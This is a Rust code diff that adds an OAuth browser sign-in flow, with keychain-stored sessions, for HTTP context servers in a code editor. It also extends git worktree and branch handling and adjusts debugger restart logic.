+ /// The server returned 401 and OAuth authorization is needed. The UI
+ /// should show an "Authenticate" button.
+ AuthRequired,
+ /// The OAuth browser flow is in progress — the user has been redirected
+ /// to the authorization server and we're waiting for the callback.
+ Authenticating,
}
impl ContextServerStatus {
@@ -54,6 +66,8 @@ impl ContextServerStatus {
ContextServerState::Running { .. } => ContextServerStatus::Running,
ContextServerState::Stopped { .. } => ContextServerStatus::Stopped,
ContextServerState::Error { error, .. } => ContextServerStatus::Error(error.clone()),
+ ContextServerState::AuthRequired { .. } => ContextServerStatus::AuthRequired,
+ ContextServerState::Authenticating { .. } => ContextServerStatus::Authenticating,
}
}
}
@@ -77,24 +91,42 @@ enum ContextServerState {
configuration: Arc<ContextServerConfiguration>,
error: Arc<str>,
},
+ /// The server requires OAuth authorization before it can be used. The
+ /// `OAuthDiscovery` holds everything needed to start the browser flow.
+ AuthRequired {
+ server: Arc<ContextServer>,
+ configuration: Arc<ContextServerConfiguration>,
+ discovery: Arc<OAuthDiscovery>,
+ },
+ /// The OAuth browser flow is in progress. The user has been redirected
+ /// to the authorization server and we're waiting for the callback.
+ Authenticating {
+ server: Arc<ContextServer>,
+ configuration: Arc<ContextServerConfiguration>,
+ _task: Task<()>,
+ },
}
impl ContextServerState {
pub fn server(&self) -> Arc<ContextServer> {
match self {
- ContextServerState::Starting { server, .. } => server.clone(),
- ContextServerState::Running { server, .. } => server.clone(),
- ContextServerState::Stopped { server, .. } => server.clone(),
- ContextServerState::Error { server, .. } => server.clone(),
+ ContextServerState::Starting { server, .. }
+ | ContextServerState::Running { server, .. }
+ | ContextServerState::Stopped { server, .. }
+ | ContextServerState::Error { server, .. }
+ | ContextServerState::AuthRequired { server, .. }
+ | ContextServerState::Authenticating { server, .. } => server.clone(),
}
}
pub fn configuration(&self) -> Arc<ContextServerConfiguration> {
match self {
- ContextServerState::Starting { configuration, .. } => configuration.clone(),
- ContextServerState::Running { configuration, .. } => configuration.clone(),
- ContextServerState::Stopped { configuration, .. } => configuration.clone(),
- ContextServerState::Error { configuration, .. } => configuration.clone(),
+ ContextServerState::Starting { configuration, .. }
+ | ContextServerState::Running { configuration, .. }
+ | ContextServerState::Stopped { configuration, .. }
+ | ContextServerState::Error { configuration, .. }
+ | ContextServerState::AuthRequired { configuration, .. }
+ | ContextServerState::Authenticating { configuration, .. } => configuration.clone(),
}
}
}
@@ -126,6 +158,15 @@ impl ContextServerConfiguration {
}
}
+ pub fn has_static_auth_header(&self) -> bool {
+ match self {
+ ContextServerConfiguration::Http { headers, .. } => headers
+ .keys()
+ .any(|k| k.eq_ignore_ascii_case("authorization")),
+ _ => false,
+ }
+ }
+
pub fn remote(&self) -> bool {
match self {
ContextServerConfiguration::Custom { remote, .. } => *remote,
@@ -517,9 +558,10 @@ impl ContextServerStore {
pub fn start_server(&mut self, server: Arc<ContextServer>, cx: &mut Context<Self>) {
cx.spawn(async move |this, cx| {
let this = this.upgrade().context("Context server store dropped")?;
+ let id = server.id();
let settings = this
.update(cx, |this, _| {
- this.context_server_settings.get(&server.id().0).cloned()
+ this.context_server_settings.get(&id.0).cloned()
})
.context("Failed to get context server settings")?;
@@ -532,7 +574,7 @@ impl ContextServerStore {
});
let configuration = ContextServerConfiguration::from_settings(
settings,
- server.id(),
+ id.clone(),
registry,
worktree_store,
cx,
@@ -590,7 +632,11 @@ impl ContextServerStore {
let id = server.id();
if matches!(
self.servers.get(&id),
- Some(ContextServerState::Starting { .. } | ContextServerState::Running { .. })
+ Some(
+ ContextServerState::Starting { .. }
+ | ContextServerState::Running { .. }
+ | ContextServerState::Authenticating { .. },
+ )
) {
self.stop_server(&id, cx).log_err();
}
@@ -600,38 +646,20 @@ impl ContextServerStore {
let configuration = configuration.clone();
async move |this, cx| {
- match server.clone().start(cx).await {
+ let new_state = match server.clone().start(cx).await {
Ok(_) => {
debug_assert!(server.client().is_some());
-
- this.update(cx, |this, cx| {
- this.update_server_state(
- id.clone(),
- ContextServerState::Running {
- server,
- configuration,
- },
- cx,
- )
- })
- .log_err()
- }
- Err(err) => {
- log::error!("{} context server failed to start: {}", id, err);
- this.update(cx, |this, cx| {
- this.update_server_state(
- id.clone(),
- ContextServerState::Error {
- configuration,
- server,
- error: err.to_string().into(),
- },
- cx,
- )
- })
- .log_err()
+ ContextServerState::Running {
+ server,
+ configuration,
+ }
}
+ Err(err) => resolve_start_failure(&id, err, server, configuration, cx).await,
};
+ this.update(cx, |this, cx| {
+ this.update_server_state(id.clone(), new_state, cx)
+ })
+ .log_err();
}
});
@@ -651,6 +679,20 @@ impl ContextServerStore {
.servers
.remove(id)
.context("Context server not found")?;
+
+ if let ContextServerConfiguration::Http { url, .. } = state.configuration().as_ref() {
+ let server_url = url.clone();
+ let id = id.clone();
+ cx.spawn(async move |_this, cx| {
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await
+ {
+ log::warn!("{} failed to clear OAuth session on removal: {}", id, err);
+ }
+ })
+ .detach();
+ }
+
drop(state);
cx.emit(ServerStatusChangedEvent {
server_id: id.clone(),
@@ -742,29 +784,71 @@ impl ContextServerStore {
configuration
};
+ if let Some(server) = this.update(cx, |this, _| {
+ this.context_server_factory
+ .as_ref()
+ .map(|factory| factory(id.clone(), configuration.clone()))
+ })? {
+ return Ok((server, configuration));
+ }
+
+ let cached_token_provider: Option<Arc<dyn oauth::OAuthTokenProvider>> =
+ if let ContextServerConfiguration::Http { url, .. } = configuration.as_ref() {
+ if configuration.has_static_auth_header() {
+ None
+ } else {
+ let credentials_provider =
+ cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ let http_client = cx.update(|cx| cx.http_client());
+
+ match Self::load_session(&credentials_provider, url, &cx).await {
+ Ok(Some(session)) => {
+ log::info!("{} loaded cached OAuth session from keychain", id);
+ Some(Self::create_oauth_token_provider(
+ &id,
+ url,
+ session,
+ http_client,
+ credentials_provider,
+ cx,
+ ))
+ }
+ Ok(None) => None,
+ Err(err) => {
+ log::warn!("{} failed to load cached OAuth session: {}", id, err);
+ None
+ }
+ }
+ }
+ } else {
+ None
+ };
+
let server: Arc<ContextServer> = this.update(cx, |this, cx| {
let global_timeout =
Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout;
- if let Some(factory) = this.context_server_factory.as_ref() {
- return anyhow::Ok(factory(id.clone(), configuration.clone()));
- }
-
match configuration.as_ref() {
ContextServerConfiguration::Http {
url,
headers,
timeout,
- } => anyhow::Ok(Arc::new(ContextServer::http(
- id,
- url,
- headers.clone(),
- cx.http_client(),
- cx.background_executor().clone(),
- Some(Duration::from_secs(
- timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS),
- )),
- )?)),
+ } => {
+ let transport = HttpTransport::new_with_token_provider(
+ cx.http_client(),
+ url.to_string(),
+ headers.clone(),
+ cx.background_executor().clone(),
+ cached_token_provider.clone(),
+ );
+ anyhow::Ok(Arc::new(ContextServer::new_with_timeout(
+ id,
+ Arc::new(transport),
+ Some(Duration::from_secs(
+ timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS),
+ )),
+ )))
+ }
_ => {
let mut command = configuration
.command()
@@ -861,6 +945,310 @@ impl ContextServerStore {
ProjectSettings::get(location, cx)
}
+ fn create_oauth_token_provider(
+ id: &ContextServerId,
+ server_url: &url::Url,
+ session: OAuthSession,
+ http_client: Arc<dyn HttpClient>,
+ credentials_provider: Arc<dyn CredentialsProvider>,
+ cx: &mut AsyncApp,
+ ) -> Arc<dyn oauth::OAuthTokenProvider> {
+ let (token_refresh_tx, mut token_refresh_rx) = futures::channel::mpsc::unbounded();
+ let id = id.clone();
+ let server_url = server_url.clone();
+
+ cx.spawn(async move |cx| {
+ while let Some(refreshed_session) = token_refresh_rx.next().await {
+ if let Err(err) =
+ Self::store_session(&credentials_provider, &server_url, &refreshed_session, &cx)
+ .await
+ {
+ log::warn!("{} failed to persist refreshed OAuth session: {}", id, err);
+ }
+ }
+ log::debug!("{} OAuth session persistence task ended", id);
+ })
+ .detach();
+
+ Arc::new(McpOAuthTokenProvider::new(
+ session,
+ http_client,
+ Some(token_refresh_tx),
+ ))
+ }
+
+ /// Initiate the OAuth browser flow for a server in the `AuthRequired` state.
+ ///
+ /// This starts a loopback HTTP callback server on an ephemeral port, builds
+ /// the authorization URL, opens the user's browser, waits for the callback,
+ /// exchanges the code for tokens, persists them in the keychain, and restarts
+ /// the server with the new token provider.
+ pub fn authenticate_server(
+ &mut self,
+ id: &ContextServerId,
+ cx: &mut Context<Self>,
+ ) -> Result<()> {
+ let state = self.servers.get(id).context("Context server not found")?;
+
+ let (discovery, server, configuration) = match state {
+ ContextServerState::AuthRequired {
+ discovery,
+ server,
+ configuration,
+ } => (discovery.clone(), server.clone(), configuration.clone()),
+ _ => anyhow::bail!("Server is not in AuthRequired state"),
+ };
+
+ let id = id.clone();
+
+ let task = cx.spawn({
+ let id = id.clone();
+ let server = server.clone();
+ let configuration = configuration.clone();
+ async move |this, cx| {
+ let result = Self::run_oauth_flow(
+ this.clone(),
+ id.clone(),
+ discovery.clone(),
+ configuration.clone(),
+ cx,
+ )
+ .await;
+
+ if let Err(err) = &result {
+ log::error!("{} OAuth authentication failed: {:?}", id, err);
+ // Transition back to AuthRequired so the user can retry
+ // rather than landing in a terminal Error state.
+ this.update(cx, |this, cx| {
+ this.update_server_state(
+ id.clone(),
+ ContextServerState::AuthRequired {
+ server,
+ configuration,
+ discovery,
+ },
+ cx,
+ )
+ })
+ .log_err();
+ }
+ }
+ });
+
+ self.update_server_state(
+ id,
+ ContextServerState::Authenticating {
+ server,
+ configuration,
+ _task: task,
+ },
+ cx,
+ );
+
+ Ok(())
+ }
+
+ async fn run_oauth_flow(
+ this: WeakEntity<Self>,
+ id: ContextServerId,
+ discovery: Arc<OAuthDiscovery>,
+ configuration: Arc<ContextServerConfiguration>,
+ cx: &mut AsyncApp,
+ ) -> Result<()> {
+ let resource = oauth::canonical_server_uri(&discovery.resource_metadata.resource);
+ let pkce = oauth::generate_pkce_challenge();
+
+ let mut state_bytes = [0u8; 32];
+ rand::rng().fill(&mut state_bytes);
+ let state_param: String = state_bytes.iter().map(|b| format!("{:02x}", b)).collect();
+
+ // Start a loopback HTTP server on an ephemeral port. The redirect URI
+ // includes this port so the browser sends the callback directly to our
+ // process.
+ let (redirect_uri, callback_rx) = oauth::start_callback_server()
+ .await
+ .context("Failed to start OAuth callback server")?;
+
+ let http_client = cx.update(|cx| cx.http_client());
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ let server_url = match configuration.as_ref() {
+ ContextServerConfiguration::Http { url, .. } => url.clone(),
+ _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"),
+ };
+
+ let client_registration =
+ oauth::resolve_client_registration(&http_client, &discovery, &redirect_uri)
+ .await
+ .context("Failed to resolve OAuth client registration")?;
+
+ let auth_url = oauth::build_authorization_url(
+ &discovery.auth_server_metadata,
+ &client_registration.client_id,
+ &redirect_uri,
+ &discovery.scopes,
+ &resource,
+ &pkce,
+ &state_param,
+ );
+
+ cx.update(|cx| cx.open_url(auth_url.as_str()));
+
+ let callback = callback_rx
+ .await
+ .map_err(|_| {
+ anyhow::anyhow!("OAuth callback server was shut down before receiving a response")
+ })?
+ .context("OAuth callback server received an invalid request")?;
+
+ if callback.state != state_param {
+ anyhow::bail!("OAuth state parameter mismatch (possible CSRF)");
+ }
+
+ let tokens = oauth::exchange_code(
+ &http_client,
+ &discovery.auth_server_metadata,
+ &callback.code,
+ &client_registration.client_id,
+ &redirect_uri,
+ &pkce.verifier,
+ &resource,
+ )
+ .await
+ .context("Failed to exchange authorization code for tokens")?;
+
+ let session = OAuthSession {
+ token_endpoint: discovery.auth_server_metadata.token_endpoint.clone(),
+ resource: discovery.resource_metadata.resource.clone(),
+ client_registration,
+ tokens,
+ };
+
+ Self::store_session(&credentials_provider, &server_url, &session, cx)
+ .await
+ .context("Failed to persist OAuth session in keychain")?;
+
+ let token_provider = Self::create_oauth_token_provider(
+ &id,
+ &server_url,
+ session,
+ http_client.clone(),
+ credentials_provider,
+ cx,
+ );
+
+ let new_server = this.update(cx, |this, cx| {
+ let global_timeout =
+ Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout;
+
+ match configuration.as_ref() {
+ ContextServerConfiguration::Http {
+ url,
+ headers,
+ timeout,
+ } => {
+ let transport = HttpTransport::new_with_token_provider(
+ http_client.clone(),
+ url.to_string(),
+ headers.clone(),
+ cx.background_executor().clone(),
+ Some(token_provider.clone()),
+ );
+ Ok(Arc::new(ContextServer::new_with_timeout(
+ id.clone(),
+ Arc::new(transport),
+ Some(Duration::from_secs(
+ timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS),
+ )),
+ )))
+ }
+ _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"),
+ }
+ })??;
+
+ this.update(cx, |this, cx| {
+ this.run_server(new_server, configuration, cx);
+ })?;
+
+ Ok(())
+ }
+
+ /// Store the full OAuth session in the system keychain, keyed by the
+ /// server's canonical URI.
+ async fn store_session(
+ credentials_provider: &Arc<dyn CredentialsProvider>,
+ server_url: &url::Url,
+ session: &OAuthSession,
+ cx: &AsyncApp,
+ ) -> Result<()> {
+ let key = Self::keychain_key(server_url);
+ let json = serde_json::to_string(session)?;
+ credentials_provider
+ .write_credentials(&key, "mcp-oauth", json.as_bytes(), cx)
+ .await
+ }
+
+ /// Load the full OAuth session from the system keychain for the given
+ /// server URL.
+ async fn load_session(
+ credentials_provider: &Arc<dyn CredentialsProvider>,
+ server_url: &url::Url,
+ cx: &AsyncApp,
+ ) -> Result<Option<OAuthSession>> {
+ let key = Self::keychain_key(server_url);
+ match credentials_provider.read_credentials(&key, cx).await? {
+ Some((_username, password_bytes)) => {
+ let session: OAuthSession = serde_json::from_slice(&password_bytes)?;
+ Ok(Some(session))
+ }
+ None => Ok(None),
+ }
+ }
+
+ /// Clear the stored OAuth session from the system keychain.
+ async fn clear_session(
+ credentials_provider: &Arc<dyn CredentialsProvider>,
+ server_url: &url::Url,
+ cx: &AsyncApp,
+ ) -> Result<()> {
+ let key = Self::keychain_key(server_url);
+ credentials_provider.delete_credentials(&key, cx).await
+ }
+
+ fn keychain_key(server_url: &url::Url) -> String {
+ format!("mcp-oauth:{}", oauth::canonical_server_uri(server_url))
+ }
+
+ /// Log out of an OAuth-authenticated MCP server: clear the stored OAuth
+ /// session from the keychain and stop the server.
+ pub fn logout_server(&mut self, id: &ContextServerId, cx: &mut Context<Self>) -> Result<()> {
+ let state = self.servers.get(id).context("Context server not found")?;
+ let configuration = state.configuration();
+
+ let server_url = match configuration.as_ref() {
+ ContextServerConfiguration::Http { url, .. } => url.clone(),
+ _ => anyhow::bail!("logout only applies to HTTP servers with OAuth"),
+ };
+
+ let id = id.clone();
+ self.stop_server(&id, cx)?;
+
+ cx.spawn(async move |this, cx| {
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await {
+ log::error!("{} failed to clear OAuth session: {}", id, err);
+ }
+ // Trigger server recreation so the next start uses a fresh
+ // transport without the old (now-invalidated) token provider.
+ this.update(cx, |this, cx| {
+ this.available_context_servers_changed(cx);
+ })
+ .log_err();
+ })
+ .detach();
+
+ Ok(())
+ }
+
fn update_server_state(
&mut self,
id: ContextServerId,
@@ -1014,3 +1402,104 @@ impl ContextServerStore {
Ok(())
}
}
+
+/// Determines the appropriate server state after a start attempt fails.
+///
+/// When the error is an HTTP 401 with no static auth header configured,
+/// attempts OAuth discovery so the UI can offer an authentication flow.
+async fn resolve_start_failure(
+ id: &ContextServerId,
+ err: anyhow::Error,
+ server: Arc<ContextServer>,
+ configuration: Arc<ContextServerConfiguration>,
+ cx: &AsyncApp,
+) -> ContextServerState {
+ let www_authenticate = err.downcast_ref::<TransportError>().map(|e| match e {
+ TransportError::AuthRequired { www_authenticate } => www_authenticate.clone(),
+ });
+
+ if www_authenticate.is_some() && configuration.has_static_auth_header() {
+ log::warn!("{id} received 401 with a static Authorization header configured");
+ return ContextServerState::Error {
+ configuration,
+ server,
+ error: "Server returned 401 Unauthorized. Check your configured Authorization header."
+ .into(),
+ };
+ }
+
+ let server_url = match configuration.as_ref() {
+ ContextServerConfiguration::Http { url, .. } if !configuration.has_static_auth_header() => {
+ url.clone()
+ }
+ _ => {
+ if www_authenticate.is_some() {
+ log::error!("{id} got OAuth 401 on a non-HTTP transport or with static auth");
+ } else {
+ log::error!("{id} context server failed to start: {err}");
+ }
+ return ContextServerState::Error {
+ configuration,
+ server,
+ error: err.to_string().into(),
+ };
+ }
+ };
+
+ // When the error is NOT a 401 but there is a cached OAuth session in the
+ // keychain, the session is likely stale/expired and caused the failure
+ // (e.g. timeout because the server rejected the token silently). Clear it
+ // so the next start attempt can get a clean 401 and trigger the auth flow.
+ if www_authenticate.is_none() {
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ match ContextServerStore::load_session(&credentials_provider, &server_url, cx).await {
+ Ok(Some(_)) => {
+ log::info!("{id} start failed with a cached OAuth session present; clearing it");
+ ContextServerStore::clear_session(&credentials_provider, &server_url, cx)
+ .await
+ .log_err();
+ }
+ _ => {
+ log::error!("{id} context server failed to start: {err}");
+ return ContextServerState::Error {
+ configuration,
+ server,
+ error: err.to_string().into(),
+ };
+ }
+ }
+ }
+
+ let default_www_authenticate = oauth::WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+ let www_authenticate = www_authenticate
+ .as_ref()
+ .unwrap_or(&default_www_authenticate);
+ let http_client = cx.update(|cx| cx.http_client());
+
+ match context_server::oauth::discover(&http_client, &server_url, www_authenticate).await {
+ Ok(discovery) => {
+ log::info!(
+ "{id} requires OAuth authorization (auth server: {})",
+ discovery.auth_server_metadata.issuer,
+ );
+ ContextServerState::AuthRequired {
+ server,
+ configuration,
+ discovery: Arc::new(discovery),
+ }
+ }
+ Err(discovery_err) => {
+ log::error!("{id} OAuth discovery failed: {discovery_err}");
+ ContextServerState::Error {
+ configuration,
+ server,
+ error: format!("OAuth discovery failed: {discovery_err}").into(),
+ }
+ }
+ }
+}
@@ -2187,21 +2187,27 @@ impl Session {
self.capabilities.supports_restart_request.unwrap_or(false) && !self.is_terminated();
self.restart_task = Some(cx.spawn(async move |this, cx| {
- let _ = this.update(cx, |session, cx| {
+ this.update(cx, |session, cx| {
if supports_dap_restart {
- session
- .request(
- RestartCommand {
- raw: args.unwrap_or(Value::Null),
- },
- Self::fallback_to_manual_restart,
- cx,
- )
- .detach();
+ session.request(
+ RestartCommand {
+ raw: args.unwrap_or(Value::Null),
+ },
+ Self::fallback_to_manual_restart,
+ cx,
+ )
} else {
cx.emit(SessionStateEvent::Restart);
+ Task::ready(None)
}
- });
+ })
+ .unwrap_or_else(|_| Task::ready(None))
+ .await;
+
+ this.update(cx, |session, _cx| {
+ session.restart_task = None;
+ })
+ .ok();
}));
}
@@ -293,6 +293,7 @@ pub struct RepositorySnapshot {
pub remote_origin_url: Option<String>,
pub remote_upstream_url: Option<String>,
pub stash_entries: GitStash,
+ pub linked_worktrees: Arc<[GitWorktree]>,
}
type JobId = u64;
@@ -429,6 +430,7 @@ pub enum RepositoryEvent {
StatusesChanged,
BranchChanged,
StashEntriesChanged,
+ GitWorktreeListChanged,
PendingOpsChanged { pending_ops: SumTree<PendingOps> },
GraphEvent((LogSource, LogOrder), GitGraphEvent),
}
@@ -578,6 +580,8 @@ impl GitStore {
client.add_entity_request_handler(Self::handle_git_clone);
client.add_entity_request_handler(Self::handle_get_worktrees);
client.add_entity_request_handler(Self::handle_create_worktree);
+ client.add_entity_request_handler(Self::handle_remove_worktree);
+ client.add_entity_request_handler(Self::handle_rename_worktree);
}
pub fn is_local(&self) -> bool {
@@ -2384,6 +2388,44 @@ impl GitStore {
Ok(proto::Ack {})
}
+ async fn handle_remove_worktree(
+ this: Entity<Self>,
+ envelope: TypedEnvelope<proto::GitRemoveWorktree>,
+ mut cx: AsyncApp,
+ ) -> Result<proto::Ack> {
+ let repository_id = RepositoryId::from_proto(envelope.payload.repository_id);
+ let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?;
+ let path = PathBuf::from(envelope.payload.path);
+ let force = envelope.payload.force;
+
+ repository_handle
+ .update(&mut cx, |repository_handle, _| {
+ repository_handle.remove_worktree(path, force)
+ })
+ .await??;
+
+ Ok(proto::Ack {})
+ }
+
+ async fn handle_rename_worktree(
+ this: Entity<Self>,
+ envelope: TypedEnvelope<proto::GitRenameWorktree>,
+ mut cx: AsyncApp,
+ ) -> Result<proto::Ack> {
+ let repository_id = RepositoryId::from_proto(envelope.payload.repository_id);
+ let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?;
+ let old_path = PathBuf::from(envelope.payload.old_path);
+ let new_path = PathBuf::from(envelope.payload.new_path);
+
+ repository_handle
+ .update(&mut cx, |repository_handle, _| {
+ repository_handle.rename_worktree(old_path, new_path)
+ })
+ .await??;
+
+ Ok(proto::Ack {})
+ }
+
async fn handle_get_branches(
this: Entity<Self>,
envelope: TypedEnvelope<proto::GitGetBranches>,
@@ -2501,11 +2543,12 @@ impl GitStore {
) -> Result<proto::Ack> {
let repository_id = RepositoryId::from_proto(envelope.payload.repository_id);
let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?;
+ let is_remote = envelope.payload.is_remote;
let branch_name = envelope.payload.branch_name;
repository_handle
.update(&mut cx, |repository_handle, _| {
- repository_handle.delete_branch(branch_name)
+ repository_handle.delete_branch(is_remote, branch_name)
})
.await??;
@@ -3535,6 +3578,7 @@ impl RepositorySnapshot {
remote_origin_url: None,
remote_upstream_url: None,
stash_entries: Default::default(),
+ linked_worktrees: Arc::from([]),
path_style,
}
}
@@ -3573,6 +3617,11 @@ impl RepositorySnapshot {
original_repo_abs_path: Some(
self.original_repo_abs_path.to_string_lossy().into_owned(),
),
+ linked_worktrees: self
+ .linked_worktrees
+ .iter()
+ .map(worktree_to_proto)
+ .collect(),
}
}
@@ -3649,9 +3698,18 @@ impl RepositorySnapshot {
original_repo_abs_path: Some(
self.original_repo_abs_path.to_string_lossy().into_owned(),
),
+ linked_worktrees: self
+ .linked_worktrees
+ .iter()
+ .map(worktree_to_proto)
+ .collect(),
}
}
+ pub fn linked_worktrees(&self) -> &[GitWorktree] {
+ &self.linked_worktrees
+ }
+
pub fn status(&self) -> impl Iterator<Item = StatusEntry> + '_ {
self.statuses_by_path.iter().cloned()
}
@@ -4965,43 +5023,69 @@ impl Repository {
}
pub fn stage_all(&mut self, cx: &mut Context<Self>) -> Task<anyhow::Result<()>> {
- let to_stage = self
- .cached_status()
- .filter_map(|entry| {
- if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) {
- if ops.staging() || ops.staged() {
+ let snapshot = self.snapshot.clone();
+ let pending_ops = self.pending_ops.clone();
+ let to_stage = cx.background_spawn(async move {
+ snapshot
+ .status()
+ .filter_map(|entry| {
+ if let Some(ops) =
+ pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ())
+ {
+ if ops.staging() || ops.staged() {
+ None
+ } else {
+ Some(entry.repo_path)
+ }
+ } else if entry.status.staging().is_fully_staged() {
None
} else {
Some(entry.repo_path)
}
- } else if entry.status.staging().is_fully_staged() {
- None
- } else {
- Some(entry.repo_path)
- }
- })
- .collect();
- self.stage_or_unstage_entries(true, to_stage, cx)
+ })
+ .collect()
+ });
+
+ cx.spawn(async move |this, cx| {
+ let to_stage = to_stage.await;
+ this.update(cx, |this, cx| {
+ this.stage_or_unstage_entries(true, to_stage, cx)
+ })?
+ .await
+ })
}
pub fn unstage_all(&mut self, cx: &mut Context<Self>) -> Task<anyhow::Result<()>> {
- let to_unstage = self
- .cached_status()
- .filter_map(|entry| {
- if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) {
- if !ops.staging() && !ops.staged() {
+ let snapshot = self.snapshot.clone();
+ let pending_ops = self.pending_ops.clone();
+ let to_unstage = cx.background_spawn(async move {
+ snapshot
+ .status()
+ .filter_map(|entry| {
+ if let Some(ops) =
+ pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ())
+ {
+ if !ops.staging() && !ops.staged() {
+ None
+ } else {
+ Some(entry.repo_path)
+ }
+ } else if entry.status.staging().is_fully_unstaged() {
None
} else {
Some(entry.repo_path)
}
- } else if entry.status.staging().is_fully_unstaged() {
- None
- } else {
- Some(entry.repo_path)
- }
- })
- .collect();
- self.stage_or_unstage_entries(false, to_unstage, cx)
+ })
+ .collect()
+ });
+
+ cx.spawn(async move |this, cx| {
+ let to_unstage = to_unstage.await;
+ this.update(cx, |this, cx| {
+ this.stage_or_unstage_entries(false, to_unstage, cx)
+ })?
+ .await
+ })
}
pub fn stash_all(&mut self, cx: &mut Context<Self>) -> Task<anyhow::Result<()>> {
@@ -5671,6 +5755,31 @@ impl Repository {
})
}
+ /// If this is a linked worktree (*NOT* the main checkout of a repository),
+ /// returns the pathed for the linked worktree.
+ ///
+ /// Returns None if this is the main checkout.
+ pub fn linked_worktree_path(&self) -> Option<&Arc<Path>> {
+ if self.work_directory_abs_path != self.original_repo_abs_path {
+ Some(&self.work_directory_abs_path)
+ } else {
+ None
+ }
+ }
+
+ pub fn path_for_new_linked_worktree(
+ &self,
+ branch_name: &str,
+ worktree_directory_setting: &str,
+ ) -> Result<PathBuf> {
+ let original_repo = self.original_repo_abs_path.clone();
+ let project_name = original_repo
+ .file_name()
+ .ok_or_else(|| anyhow!("git repo must have a directory name"))?;
+ let directory = worktrees_directory_for_repo(&original_repo, worktree_directory_setting)?;
+ Ok(directory.join(branch_name).join(project_name))
+ }
+
pub fn worktrees(&mut self) -> oneshot::Receiver<Result<Vec<GitWorktree>>> {
let id = self.id;
self.send_job(None, move |repo, _| async move {
@@ -5700,25 +5809,25 @@ impl Repository {
pub fn create_worktree(
&mut self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
commit: Option<String>,
) -> oneshot::Receiver<Result<()>> {
let id = self.id;
self.send_job(
- Some("git worktree add".into()),
+ Some(format!("git worktree add: {}", branch_name).into()),
move |repo, _cx| async move {
match repo {
RepositoryState::Local(LocalRepositoryState { backend, .. }) => {
- backend.create_worktree(name, directory, commit).await
+ backend.create_worktree(branch_name, path, commit).await
}
RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
client
.request(proto::GitCreateWorktree {
project_id: project_id.0,
repository_id: id.to_proto(),
- name,
- directory: directory.to_string_lossy().to_string(),
+ name: branch_name,
+ directory: path.to_string_lossy().to_string(),
commit,
})
.await?;
@@ -5731,6 +5840,7 @@ impl Repository {
}
pub fn remove_worktree(&mut self, path: PathBuf, force: bool) -> oneshot::Receiver<Result<()>> {
+ let id = self.id;
self.send_job(
Some(format!("git worktree remove: {}", path.display()).into()),
move |repo, _cx| async move {
@@ -5738,10 +5848,47 @@ impl Repository {
RepositoryState::Local(LocalRepositoryState { backend, .. }) => {
backend.remove_worktree(path, force).await
}
- RepositoryState::Remote(_) => {
- anyhow::bail!(
- "Removing worktrees on remote repositories is not yet supported"
- )
+ RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
+ client
+ .request(proto::GitRemoveWorktree {
+ project_id: project_id.0,
+ repository_id: id.to_proto(),
+ path: path.to_string_lossy().to_string(),
+ force,
+ })
+ .await?;
+
+ Ok(())
+ }
+ }
+ },
+ )
+ }
+
+ pub fn rename_worktree(
+ &mut self,
+ old_path: PathBuf,
+ new_path: PathBuf,
+ ) -> oneshot::Receiver<Result<()>> {
+ let id = self.id;
+ self.send_job(
+ Some(format!("git worktree move: {}", old_path.display()).into()),
+ move |repo, _cx| async move {
+ match repo {
+ RepositoryState::Local(LocalRepositoryState { backend, .. }) => {
+ backend.rename_worktree(old_path, new_path).await
+ }
+ RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
+ client
+ .request(proto::GitRenameWorktree {
+ project_id: project_id.0,
+ repository_id: id.to_proto(),
+ old_path: old_path.to_string_lossy().to_string(),
+ new_path: new_path.to_string_lossy().to_string(),
+ })
+ .await?;
+
+ Ok(())
}
}
},
@@ -5923,18 +6070,32 @@ impl Repository {
)
}
- pub fn delete_branch(&mut self, branch_name: String) -> oneshot::Receiver<Result<()>> {
+ pub fn delete_branch(
+ &mut self,
+ is_remote: bool,
+ branch_name: String,
+ ) -> oneshot::Receiver<Result<()>> {
let id = self.id;
self.send_job(
- Some(format!("git branch -d {branch_name}").into()),
+ Some(
+ format!(
+ "git branch {} {}",
+ if is_remote { "-dr" } else { "-d" },
+ branch_name
+ )
+ .into(),
+ ),
move |repo, _cx| async move {
match repo {
- RepositoryState::Local(state) => state.backend.delete_branch(branch_name).await,
+ RepositoryState::Local(state) => {
+ state.backend.delete_branch(is_remote, branch_name).await
+ }
RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => {
client
.request(proto::GitDeleteBranch {
project_id: project_id.0,
repository_id: id.to_proto(),
+ is_remote,
branch_name,
})
.await?;
@@ -6067,6 +6228,15 @@ impl Repository {
cx.emit(RepositoryEvent::StashEntriesChanged)
}
self.snapshot.stash_entries = new_stash_entries;
+ let new_linked_worktrees: Arc<[GitWorktree]> = update
+ .linked_worktrees
+ .iter()
+ .map(proto_to_worktree)
+ .collect();
+ if *self.snapshot.linked_worktrees != *new_linked_worktrees {
+ cx.emit(RepositoryEvent::GitWorktreeListChanged);
+ }
+ self.snapshot.linked_worktrees = new_linked_worktrees;
self.snapshot.remote_upstream_url = update.remote_upstream_url;
self.snapshot.remote_origin_url = update.remote_origin_url;
